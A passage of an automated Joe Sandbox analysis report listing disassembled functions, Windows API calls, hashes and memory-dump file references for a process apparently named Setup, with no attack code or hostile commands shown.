                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: BuffersChangeCloseErrorFileFindFlushLastNotification
                                                              • String ID:
                                                              • API String ID: 4236133906-0
                                                              • Opcode ID: 22125a0e5987eee25c922c51b9b15f5efc177052e7e0671a276a5f9031195a69
                                                              • Instruction ID: 5a4c2f9fdf94d4e862a53ded975e74c0b131640d505bf64bff3552301bdc2818
                                                              • Opcode Fuzzy Hash: 22125a0e5987eee25c922c51b9b15f5efc177052e7e0671a276a5f9031195a69
                                                              • Instruction Fuzzy Hash: 6DD017316107018BEB349F31E40EB56B7F8FF4139AF014E29E462D6940DBB4E818CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00032915 Relevance: 3.0, APIs: 2, Instructions: 8memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 0003291C
                                                              • Run.SETUPENGINE ref: 00032922
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Offset: 00030000, based on PE: true
                                                              • Associated: 00000004.00000002.3249837396.0000000000030000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.3251530207.0000000000038000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.3252634934.000000000003A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_30000_Setup.jbxd
                                                              Similarity
                                                              • API ID: HeapInformation
                                                              • String ID:
                                                              • API String ID: 3918721486-0
                                                              • Opcode ID: dacb25f803629521cb6e4f848b4948696abab5d5a9114d77cd94ad19b2c1c870
                                                              • Instruction ID: 83820614b36baaf0b065b613755699eb154e9067dec5cd91405bd6112978c37f
                                                              • Opcode Fuzzy Hash: dacb25f803629521cb6e4f848b4948696abab5d5a9114d77cd94ad19b2c1c870
                                                              • Instruction Fuzzy Hash: 21B092B05201406EFA055760AD4CFB6261CE708342F000811B806C00A4C6E848808520
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9484FF Relevance: 2.5, APIs: 2, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,6C94FA6E,02642228,?,?,6C9483B3,02642228,6C90A794,02642228,6C90A794,00000000), ref: 6C94851E
                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,6C94FA6E,02642228,?,?,6C9483B3,02642228,6C90A794,02642228,6C90A794), ref: 6C94853F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 626452242-0
                                                              • Opcode ID: 3f68fd86e84c37b323c727d242d004b5f10c28051f9fb515e7698c5780032718
                                                              • Instruction ID: a6ce4e6c17d1248d9e78bae83065ee7ce7a81bce43c272f2cd60be5795674b87
                                                              • Opcode Fuzzy Hash: 3f68fd86e84c37b323c727d242d004b5f10c28051f9fb515e7698c5780032718
                                                              • Instruction Fuzzy Hash: 00F0963224512477DB155A5A8C44EDF7B2DEBA7B74F108216F628979C08A30D501CBF9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C913A16 Relevance: 1.7, APIs: 1, Instructions: 193COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913A1D
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C948C7A: __EH_prolog3.LIBCMT ref: 6C948C81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: c4e9c61ba0c129cf4088808e319249a235a8db9581b5106d0c521ef200c97965
                                                              • Instruction ID: 5d8e6e80112b964e0d2b9e23f781ee99621110d2cf0bb66823561ce6353ea1ac
                                                              • Opcode Fuzzy Hash: c4e9c61ba0c129cf4088808e319249a235a8db9581b5106d0c521ef200c97965
                                                              • Instruction Fuzzy Hash: D97190719052099FDB00DFB8C9817DDBBB4AF25328F148246E921BBBD1D730DA48C7A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9341FE Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C934205
                                                                • Part of subcall function 6C922771: __EH_prolog3.LIBCMT ref: 6C922778
                                                                • Part of subcall function 6C934F19: __EH_prolog3.LIBCMT ref: 6C934F20
                                                                • Part of subcall function 6C932081: __EH_prolog3.LIBCMT ref: 6C932088
                                                                • Part of subcall function 6C91C17A: _calloc.LIBCMT ref: 6C91C1A0
                                                                • Part of subcall function 6C9678C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C95139B,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?,?,?), ref: 6C9678D3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ExceptionRaise_calloc
                                                              • String ID:
                                                              • API String ID: 1540488672-0
                                                              • Opcode ID: 81ee598285e91578967637edb629b1c654da914a389af95af8938ee746ea4aa9
                                                              • Instruction ID: b98bf3665be69fe20bb53e73a906139cfb20731e68d014e2e9c7aef9dad1510f
                                                              • Opcode Fuzzy Hash: 81ee598285e91578967637edb629b1c654da914a389af95af8938ee746ea4aa9
                                                              • Instruction Fuzzy Hash: AC513C71905249DFCB00CF64C584BD97BB4BF19304F1584A9DD49AFB16C771EA09CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C947889 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C947890
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C94A226: GetTickCount.KERNEL32 ref: 6C94A241
                                                                • Part of subcall function 6C94A226: GetTickCount.KERNEL32 ref: 6C94A27C
                                                                • Part of subcall function 6C94A226: __time64.LIBCMT ref: 6C94A282
                                                                • Part of subcall function 6C94A226: InitializeCriticalSection.KERNEL32(00000040,?,6C947905,?), ref: 6C94A292
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CountTick$CriticalH_prolog3InitializeSection__time64_malloc
                                                              • String ID:
                                                              • API String ID: 349597444-0
                                                              • Opcode ID: 61218f45e76452ac2b7aa2b4365ea5ff593168a1de8f39c8718be3bade73bf5d
                                                              • Instruction ID: ae3fb3cda61682831bb90864e1a45a80680d14a9ca2542b7a4294ea4b733dcd5
                                                              • Opcode Fuzzy Hash: 61218f45e76452ac2b7aa2b4365ea5ff593168a1de8f39c8718be3bade73bf5d
                                                              • Instruction Fuzzy Hash: A1518A75600608DFDB08DF78C894AAD37B5FF19324B2086A9F916DB7A1CB30EA15CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9259B8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9259BF
                                                                • Part of subcall function 6C9256A3: SysFreeString.OLEAUT32(?), ref: 6C92578A
                                                                • Part of subcall function 6C9256A3: SysFreeString.OLEAUT32(?), ref: 6C925799
                                                                • Part of subcall function 6C9256A3: SysFreeString.OLEAUT32(?), ref: 6C9257C7
                                                                • Part of subcall function 6C951315: __EH_prolog3.LIBCMT ref: 6C95131C
                                                                • Part of subcall function 6C951315: _free.LIBCMT ref: 6C95137B
                                                                • Part of subcall function 6C94B17C: __recalloc.LIBCMT ref: 6C94B18D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FreeString$H_prolog3$__recalloc_free
                                                              • String ID:
                                                              • API String ID: 2446356840-0
                                                              • Opcode ID: f5a02059e2909d3a86d8f4325a2348cba4000e6dfd15c651287b63d1c311390b
                                                              • Instruction ID: 3c7e0a094d5e4c231301c2f888a38779b0c51de6dc014d6a86bbb846c0969bcd
                                                              • Opcode Fuzzy Hash: f5a02059e2909d3a86d8f4325a2348cba4000e6dfd15c651287b63d1c311390b
                                                              • Instruction Fuzzy Hash: 835123B1A013099FCB04CFA8C48169EBBF0BF28304F14856ED459ABB54D734EA49CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C92A655 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92A65C
                                                                • Part of subcall function 6C92670B: __EH_prolog3.LIBCMT ref: 6C926712
                                                                • Part of subcall function 6C926BBD: __EH_prolog3.LIBCMT ref: 6C926BC4
                                                                • Part of subcall function 6C923B22: __EH_prolog3.LIBCMT ref: 6C923B29
                                                                • Part of subcall function 6C929746: __EH_prolog3.LIBCMT ref: 6C92974D
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_memcpy_s
                                                              • String ID:
                                                              • API String ID: 1663610674-0
                                                              • Opcode ID: 17599d0ad64da573f748c698e0e727eeafc939c380d0d926a3576f06fe516d43
                                                              • Instruction ID: 1640e38a9ef41c86be3998d8da5b3a703bcac618be01e46cdea33e8e2c691526
                                                              • Opcode Fuzzy Hash: 17599d0ad64da573f748c698e0e727eeafc939c380d0d926a3576f06fe516d43
                                                              • Instruction Fuzzy Hash: 39514A72600345CFDB50DF68C4817C97BA4AF25304F1884AECC89AFB1AD774EA49CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9514D1 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9514D8
                                                                • Part of subcall function 6C953ACC: __EH_prolog3.LIBCMT ref: 6C953AD3
                                                                • Part of subcall function 6C953ACC: _memcpy_s.LIBCMT ref: 6C953B17
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_memcpy_s
                                                              • String ID:
                                                              • API String ID: 1663610674-0
                                                              • Opcode ID: b3b6964a2551a07232b36ba575e5b4cc64cb1464961431fd9eb32576793a220a
                                                              • Instruction ID: 70cef66c6d0e64c32f101a6bf409e3c1352fbed8507109cbadb5158d95e306b2
                                                              • Opcode Fuzzy Hash: b3b6964a2551a07232b36ba575e5b4cc64cb1464961431fd9eb32576793a220a
                                                              • Instruction Fuzzy Hash: 9D41FA71A0020ADFDF05DFA8C884AEEBBB5BF29308F404459E914AB750C771ED19CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A5DEE Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 6C4A5E81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              • Opcode ID: b352b835ff6871c50ea8fe139ecb99d3ad9a513fb4eda463f43d76ba2564f64c
                                                              • Instruction ID: c009a40e3fd1f6cd5b9566e66b2b272ff0fec01ba8b13968339a74d207b8bded
                                                              • Opcode Fuzzy Hash: b352b835ff6871c50ea8fe139ecb99d3ad9a513fb4eda463f43d76ba2564f64c
                                                              • Instruction Fuzzy Hash: BB21CC71104B04AFCB20CF95CA80E8FBBF5EF68315F20850AE85697A54C331E982CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4964C2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4964C9
                                                                • Part of subcall function 6C48D349: __EH_prolog3.LIBCMT ref: 6C48D350
                                                                • Part of subcall function 6C48D76F: __EH_prolog3.LIBCMT ref: 6C48D776
                                                                • Part of subcall function 6C48D2B6: __EH_prolog3.LIBCMT ref: 6C48D2BD
                                                                • Part of subcall function 6C49F5FD: __EH_prolog3.LIBCMT ref: 6C49F604
                                                                • Part of subcall function 6C49F5FD: __recalloc.LIBCMT ref: 6C49F612
                                                                • Part of subcall function 6C48D4C5: __EH_prolog3.LIBCMT ref: 6C48D4CC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID:
                                                              • API String ID: 1900422986-0
                                                              • Opcode ID: 43352892bf9d17e7fded7039b23e338f1cbf14336471bfa93223dcecc660f442
                                                              • Instruction ID: fd6792429cf548a4816c78062878faddc672b41db82556a1be402b30217a42ce
                                                              • Opcode Fuzzy Hash: 43352892bf9d17e7fded7039b23e338f1cbf14336471bfa93223dcecc660f442
                                                              • Instruction Fuzzy Hash: 97213B329011199BCF01DBA8C944EDEB7B4AF54668F244259E424BB795EB34EA09CBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C932081 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C932088
                                                                • Part of subcall function 6C9678C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C95139B,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?,?,?), ref: 6C9678D3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ExceptionH_prolog3Raise
                                                              • String ID:
                                                              • API String ID: 741760457-0
                                                              • Opcode ID: 18fc04472e25cf937a9f3dc98122a72e6943e946ba6c893ff0db1acd94bc41b7
                                                              • Instruction ID: 53d63e9fa124212ad29f5167ffb6efa3fd5e00e4451c4238e1cf36d758f1e341
                                                              • Opcode Fuzzy Hash: 18fc04472e25cf937a9f3dc98122a72e6943e946ba6c893ff0db1acd94bc41b7
                                                              • Instruction Fuzzy Hash: FD2156B0A01A46CFCB08CF68C1948A9FBF1FF68300725C59DD4599BB22C730E954CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9536BA Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C9566E5: __EH_prolog3.LIBCMT ref: 6C9566EC
                                                                • Part of subcall function 6C9566E5: GetCommandLineW.KERNEL32(00000024,6C9536CF,00000000,?,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498), ref: 6C9566F3
                                                                • Part of subcall function 6C9566E5: GetUserDefaultUILanguage.KERNEL32(00000738,00000000,00000000,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?), ref: 6C95672F
                                                                • Part of subcall function 6C956782: __EH_prolog3.LIBCMT ref: 6C956789
                                                                • Part of subcall function 6C956782: CoInitialize.OLE32(00000000), ref: 6C9567DD
                                                                • Part of subcall function 6C956782: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,6C94FA6E,?,?,?,UiInfo.xml,?,00000000,00000044,6C9536D8,02642228,?,00000000), ref: 6C9567FB
                                                              • GetUserDefaultUILanguage.KERNEL32(02642228,?,00000000,?,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498), ref: 6C9536D8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DefaultH_prolog3LanguageUser$CommandCreateInitializeInstanceLine
                                                              • String ID:
                                                              • API String ID: 4049621043-0
                                                              • Opcode ID: 8fa91619c10349100861cad4dabd5229facc1bb8c5040e4aa6604ddbe75350ec
                                                              • Instruction ID: 2a73798773389a875b63736887ac081b52298ca00fddfd29ee92f9848251c163
                                                              • Opcode Fuzzy Hash: 8fa91619c10349100861cad4dabd5229facc1bb8c5040e4aa6604ddbe75350ec
                                                              • Instruction Fuzzy Hash: 730108716016415FE310CA3AC8C085A7399EF61274BA0832DE5B587BD0E730DC118B51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C970EDA Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C96D777,6C96C0C9,?,00000000,00000000,00000000,?,6C96D37E,00000001,00000214,?,6C94831D), ref: 6C970F1D
                                                                • Part of subcall function 6C96BD29: __getptd_noexit.LIBCMT ref: 6C96BD29
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 328603210-0
                                                              • Opcode ID: 7fb0baeab95c3f48aafa07f58b97e242810e648beef80d45feee09a53602e32c
                                                              • Instruction ID: 72e0b54ccad0c606f6cdfcf6d29675eaa63cf8ec486b88ff2065f071e17876fb
                                                              • Opcode Fuzzy Hash: 7fb0baeab95c3f48aafa07f58b97e242810e648beef80d45feee09a53602e32c
                                                              • Instruction Fuzzy Hash: 5501F53130B2919AEB288F66D910B5A37A8AF42368F10562AF829CA980D772C420C660
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4AD6DC Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C4A9F86,6C4A91D6,?,00000000,00000000,00000000,?,6C4A9B8D,00000001,00000214,?,6C4AB575), ref: 6C4AD71F
                                                                • Part of subcall function 6C4AB570: __getptd_noexit.LIBCMT ref: 6C4AB570
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 328603210-0
                                                              • Opcode ID: 97229198c738f32c7c958c661674abe6941dfbfd80bf49bf5dd5976310c2de26
                                                              • Instruction ID: 78ef3a8e5fe6932626967fc4aab8c3e299a2f5537db668b3285f92732fe206e7
                                                              • Opcode Fuzzy Hash: 97229198c738f32c7c958c661674abe6941dfbfd80bf49bf5dd5976310c2de26
                                                              • Instruction Fuzzy Hash: FF01F53D7012158BFB1DDEE1C848F5633A4ABA2769F104629EC258BAD8DB70C402C280
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000361AE Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
